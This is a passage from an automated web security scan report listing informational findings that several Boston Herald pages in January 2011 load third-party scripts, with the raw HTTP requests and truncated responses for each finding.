<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.759. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.760. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:27:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.761. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.762. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.763. http://www.bostonherald.com/track/star_tracks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js

Request

GET /track/star_tracks/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.764. http://www.bostonherald.com/track/star_tracks/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

18.765. http://www.bostonherald.com/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:41:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.766. http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:39:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
